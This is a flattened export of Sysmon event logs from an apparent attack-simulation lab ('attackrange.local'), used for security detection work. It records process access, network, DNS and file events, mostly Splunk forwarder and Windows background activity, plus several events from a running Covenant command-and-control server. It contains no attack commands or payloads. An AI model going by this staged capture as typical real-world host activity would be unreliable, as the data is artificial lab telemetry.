21:44:02.651{39BD8DE3-0F64-60CA-0C00-00000000D101}7201984C:\Windows\system32\svchost.exe{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x8000000000000000149921Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:02.651{39BD8DE3-0F64-60CA-0C00-00000000D101}7201984C:\Windows\system32\svchost.exe{39BD8DE3-0FDB-60CA-8D00-00000000D101}648C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x8000000000000000149920Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:02.651{39BD8DE3-0F64-60CA-0C00-00000000D101}7201984C:\Windows\system32\svchost.exe{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x8000000000000000149919Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:02.651{39BD8DE3-0F65-60CA-1F00-00000000D101}1340208C:\Windows\system32\svchost.exe{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\tileobjserver.dll+bce2|c:\windows\system32\tileobjserver.dll+26da2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x8000000000000000149918Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:02.651{39BD8DE3-0F65-60CA-1F00-00000000D101}1340208C:\Windows\system32\svchost.exe{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|c:\windows\system32\tileobjserver.dll+bc8f|c:\windows\system32\tileobjserver.dll+26da2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a 10341000x8000000000000000149917Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:02.530{39BD8DE3-0FD9-60CA-8500-00000000D101}32646664C:\Windows\system32\sihost.exe{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+1121|C:\Windows\System32\modernexecserver.dll+386f0|C:\Windows\System32\modernexecserver.dll+2ff00|C:\Windows\System32\modernexecserver.dll+1e81d|C:\Windows\System32\modernexecserver.dll+1e514|C:\Windows\System32\modernexecserver.dll+49142|C:\Windows\System32\modernexecserver.dll+14a47|C:\Windows\SYSTEM32\ntdll.dll+3a940|C:\Windows\SYSTEM32\ntdll.dll+1e86f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000149916Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:00.128{39BD8DE3-709A-60CA-080D-00000000D101}4924C:\Program Files\dotnet\dotnet.exeWIN-HOST-14\Administratortcptruefalse10.0.1.15win-host-14.attackrange.local58344-false20.189.172.0-443https 354300x8000000000000000149915Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:00.120{39BD8DE3-709A-60CA-080D-00000000D101}4924C:\Program Files\dotnet\dotnet.exeWIN-HOST-14\Administratortcptruefalse10.0.1.15win-host-14.attackrange.local58345-false20.189.172.0-443https 23542300x8000000000000000149914Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:02.451{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B83BE6164AF3505A6F61E4E64090E1CD,SHA256=D53D37815490F7C0A76A679D8E10BA84265E018F1671D7FA143BB72343068498,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000149913Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:02.382{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D24874D400AF92F16ABFFCF7C85BD9B7,SHA256=40B278080715EDFF7B846A61E0B105C7C09054D0B4A74BD24CE939565DDB31AB,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000104604Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:01.927{54715871-FD28-60C9-2F00-00000000CF01}2148C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-681.attackrange.local53domainfalse10.0.1.15ip-10-0-1-15.us-west-2.compute.internal62759- 23542300x8000000000000000104603Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:03.505{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F1864382D6F1B87F11FD62D6F9F9170E,SHA256=A94F772B54F9AAF496E1824E23BC2F306BDBAADEA75FD40691DBECBDA9CC3891,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104602Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:03.486{54715871-FD28-60C9-3000-00000000CF01}2448NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=87657D68C727D4F417C5346ABF35F152,SHA256=9C850A5D797C891B275B40E6DB9307C8C7979F29879EB6EAEEA9A86ED4C088D1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000149932Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:03.872{39BD8DE3-70A0-60CA-0A0D-00000000D101}5808WIN-HOST-14\AdministratorC:\Users\Administrator\Covenant\Covenant\bin\Debug\netcoreapp3.1\Covenant.exeC:\Users\Administrator\Covenant\Covenant\Data\covenant.db-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000149931Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:03.454{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3A388F38CD07BA713FB1FE0CAC83BC39,SHA256=B1BC6E6B6E50BD9C92C537CDED77726178320D90C31AC86FA649810E1F2BA371,IMPHASH=00000000000000000000000000000000falsetrue 22542200x8000000000000000149930Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:00.103{39BD8DE3-709A-60CA-080D-00000000D101}4924dc.services.visualstudio.com0type: 5 dc.applicationinsights.microsoft.com;type: 5 dc.applicationinsights.azure.com;type: 5 global.in.ai.monitor.azure.com;type: 5 global.in.ai.privatelink.monitor.azure.com;type: 5 dc.trafficmanager.net;type: 5 wus03-breeziest-in.cloudapp.net;::ffff:20.189.172.0;C:\Program Files\dotnet\dotnet.exe 354300x8000000000000000149929Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:01.971{39BD8DE3-4818-60CA-2408-00000000D101}4064C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-14.attackrange.local58347-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000104605Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:04.905{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=51114388DC5C7F8A7F4B0704AE4C3376,SHA256=6E40E3A326B94BFE3D03041A10859D85217E5E7C3FFD03FEF8C69F1432CC6A96,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000149946Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:04.973{39BD8DE3-0F64-60CA-0C00-00000000D101}7207160C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149945Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:04.973{39BD8DE3-0F64-60CA-0C00-00000000D101}7207160C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149944Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:04.973{39BD8DE3-0F64-60CA-0C00-00000000D101}7207160C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149943Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:04.973{39BD8DE3-0F64-60CA-0C00-00000000D101}7207160C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149942Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:04.973{39BD8DE3-0F63-60CA-0500-00000000D101}408976C:\Windows\system32\csrss.exe{39BD8DE3-70A4-60CA-0B0D-00000000D101}3356C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000149941Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:04.973{39BD8DE3-480D-60CA-F607-00000000D101}51125172C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{39BD8DE3-70A4-60CA-0B0D-00000000D101}3356C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000149940Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:04.843{39BD8DE3-70A4-60CA-0B0D-00000000D101}3356C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{39BD8DE3-0F64-60CA-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{39BD8DE3-480D-60CA-F607-00000000D101}5112C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000149939Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:04.510{39BD8DE3-70A0-60CA-0A0D-00000000D101}5808WIN-HOST-14\AdministratorC:\Users\Administrator\Covenant\Covenant\bin\Debug\netcoreapp3.1\Covenant.exeC:\Users\Administrator\Covenant\Covenant\Data\covenant.db-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000149938Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:04.495{39BD8DE3-70A0-60CA-0A0D-00000000D101}5808WIN-HOST-14\AdministratorC:\Users\Administrator\Covenant\Covenant\bin\Debug\netcoreapp3.1\Covenant.exeC:\Users\Administrator\Covenant\Covenant\Data\covenant.db-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000149937Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:04.457{39BD8DE3-70A0-60CA-0A0D-00000000D101}5808WIN-HOST-14\AdministratorC:\Users\Administrator\Covenant\Covenant\bin\Debug\netcoreapp3.1\Covenant.exeC:\Users\Administrator\Covenant\Covenant\Data\covenant.db-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000149936Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:04.457{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BB6978FAFBB9BC34B23BF84B116921E9,SHA256=0CFFDCE7F58B7886DCDD82761246AACF3FB8EC3D775C1FEAEFB12D4C1835DEDC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000149935Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:04.426{39BD8DE3-70A0-60CA-0A0D-00000000D101}5808WIN-HOST-14\AdministratorC:\Users\Administrator\Covenant\Covenant\bin\Debug\netcoreapp3.1\Covenant.exeC:\Users\Administrator\Covenant\Covenant\Data\covenant.db-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000149934Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:04.103{39BD8DE3-70A0-60CA-0A0D-00000000D101}5808WIN-HOST-14\AdministratorC:\Users\Administrator\Covenant\Covenant\bin\Debug\netcoreapp3.1\Covenant.exeC:\Users\Administrator\Covenant\Covenant\Data\covenant.db-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000149933Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:04.087{39BD8DE3-70A0-60CA-0A0D-00000000D101}5808WIN-HOST-14\AdministratorC:\Users\Administrator\Covenant\Covenant\bin\Debug\netcoreapp3.1\Covenant.exeC:\Users\Administrator\Covenant\Covenant\Data\covenant.db-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000104607Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:03.892{54715871-FD33-60C9-6D00-00000000CF01}3756C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-681.attackrange.local55390-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 354300x8000000000000000104606Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:03.163{54715871-FD28-60C9-3000-00000000CF01}2448C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-681.attackrange.local55389-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8089- 10341000x8000000000000000149957Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:05.901{39BD8DE3-480E-60CA-FA07-00000000D101}71324084C:\Windows\system32\conhost.exe{39BD8DE3-70A5-60CA-0C0D-00000000D101}5552C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149956Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:05.901{39BD8DE3-0F64-60CA-0C00-00000000D101}7207160C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 